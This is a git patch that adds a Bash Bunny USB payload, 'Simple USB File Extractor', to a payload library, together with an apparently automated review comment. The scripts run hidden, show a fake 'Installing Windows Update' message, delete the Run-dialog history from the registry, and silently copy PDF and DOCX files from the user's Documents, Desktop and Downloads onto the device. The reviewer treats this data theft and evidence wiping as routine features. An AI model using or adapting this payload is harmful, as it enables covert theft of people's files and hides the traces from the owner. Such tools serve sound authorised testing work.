From 6fa5887aae88bbd898c97f097b6cf7122f99b528 Mon Sep 17 00:00:00 2001
From: danthegoodman1
Date: Tue, 12 Dec 2017 03:11:25 -0500
Subject: [PATCH] Addition of Exfiltration payload (#300)
---
.../exfiltration/simple-usb-extractor/i.vbs | 1 +
.../simple-usb-extractor/payload.txt | 6 +++
.../simple-usb-extractor/readme.md | 32 ++++++++++++++++
.../exfiltration/simple-usb-extractor/x.cmd | 37 +++++++++++++++++++
.../exfiltration/simple-usb-extractor/z.cmd | 3 ++
5 files changed, 79 insertions(+)
create mode 100644 payloads/library/exfiltration/simple-usb-extractor/i.vbs
create mode 100644 payloads/library/exfiltration/simple-usb-extractor/payload.txt
create mode 100644 payloads/library/exfiltration/simple-usb-extractor/readme.md
create mode 100644 payloads/library/exfiltration/simple-usb-extractor/x.cmd
create mode 100644 payloads/library/exfiltration/simple-usb-extractor/z.cmd
diff --git a/payloads/library/exfiltration/simple-usb-extractor/i.vbs b/payloads/library/exfiltration/simple-usb-extractor/i.vbs
new file mode 100644
index 00000000..25dd4e32
--- /dev/null
+++ b/payloads/library/exfiltration/simple-usb-extractor/i.vbs
@@ -0,0 +1 @@
+CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
diff --git a/payloads/library/exfiltration/simple-usb-extractor/payload.txt b/payloads/library/exfiltration/simple-usb-extractor/payload.txt
new file mode 100644
index 00000000..d3d434be
--- /dev/null
+++ b/payloads/library/exfiltration/simple-usb-extractor/payload.txt
@@ -0,0 +1,6 @@
+# Executes z.cmd from the switch position's folder, thus launching x.cmd silently using i.vbs
+GET SWITCH_POSITION
+LED ATTACK
+ATTACKMODE HID STORAGE
+RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\z.cmd')"
+LED FINISH
diff --git a/payloads/library/exfiltration/simple-usb-extractor/readme.md b/payloads/library/exfiltration/simple-usb-extractor/readme.md
new file mode 100644
index 00000000..81d58dda
--- /dev/null
+++ b/payloads/library/exfiltration/simple-usb-extractor/readme.md
@@ -0,0 +1,32 @@
+# Simple USB File Extractor
+---
+- Author: DanTheGoodman
+- Creds: thehappydinoa, sebkinne
+(I snagged lots of lines from their code)
+
+### Description
+---
+A stupid easy to use file extractor leveraging the USB storage attack mode. Will stuff the found files in the `/loot/simple-usb-file-extractor` folder. Also deletes the run-line history because why not.
+
+
+
+### Dependencies
+---
+None :)
+
+
+
+### Configuration (optional)
+---
+By default the payload is set to pull all .pdf and .docx files from the Desktop, Downloads, and Documents folders. You can add new items/locations by making new xcopy lines in the x.cmd file.
+
+
+### Status:
+---
+|LED|Status|
+|---|---|
+|Yellow single blink|Running payload|
+|Solid Green|Files copied|
+
+---
+This is my first payload for the Bash Bunny, and I have finals right now, and I am doing this instead of studying so it's not fancy but I wanted to make something.
diff --git a/payloads/library/exfiltration/simple-usb-extractor/x.cmd b/payloads/library/exfiltration/simple-usb-extractor/x.cmd
new file mode 100644
index 00000000..757d8fd8
--- /dev/null
+++ b/payloads/library/exfiltration/simple-usb-extractor/x.cmd
@@ -0,0 +1,37 @@
+@echo off
+@echo Installing Windows Update
+
+REM Delete registry keys storing Run dialog history
+REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
+
+REM Set the location
+set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
+mkdir %dst% >>nul
+
+if Exist %USERPROFILE%\Documents (
+REM /C Continues copying even if errors occur.
+REM /Q Does not display file names while copying.
+REM /G Allows the copying of encrypted files to destination that does not support encryption.
+REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
+REM /E Copies directories and subdirectories, including empty ones.
+
+REM Add more of the line below specifying the location and file type
+REM The below example grabs all .pdf files from the user's documents folder
+REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
+
+xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.pdf %dst% >>nul
+xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.docx %dst% >>nul
+)
+
+if Exist %USERPROFILE%\Desktop (
+xcopy /C /Q /G /Y %USERPROFILE%\Desktop\*.pdf %dst% >>nul
+xcopy /C /Q /G /Y %USERPROFILE%\Desktop\*.docx %dst% >>nul
+)
+
+if Exist %USERPROFILE%\Downloads (
+xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.pdf %dst% >>nul
+xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.docx %dst% >>nul
+)
+
+@cls
+@exit
diff --git a/payloads/library/exfiltration/simple-usb-extractor/z.cmd b/payloads/library/exfiltration/simple-usb-extractor/z.cmd
new file mode 100644
index 00000000..ed5eb189
--- /dev/null
+++ b/payloads/library/exfiltration/simple-usb-extractor/z.cmd
@@ -0,0 +1,3 @@
+@echo off
+cscript %~dp0\i.vbs %~dp0\x.cmd
+@exit
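Review bot: The output folder built on the `set dst=` line, `..\..\loot\USB_Exfiltration\%COMPUTERNAME%_<date>_<time>`, does not match the folder the readme's Description names (`/loot/simple-usb-file-extractor`), so one of the two is wrong; the simplest fix is to have the readme sentence name the `/loot/USB_Exfiltration/<COMPUTERNAME>_<date>_<time>` folder that the script actually creates. Inside the Documents branch the flag comments describe `/E`, but only the commented-out example line uses that flag and none of the six live xcopy lines do, so the comment should say so, e.g. `REM /E (used only in the example line below) Copies directories and subdirectories, including empty ones.`. The `REG DELETE ... RunMRU /f` line is the only step that modifies the host rather than reading from it, yet the header comment and the readme treat it as incidental; the readme's Configuration section should list it as an optional step that can be removed, in the same way it already tells the reader how to edit the xcopy lines.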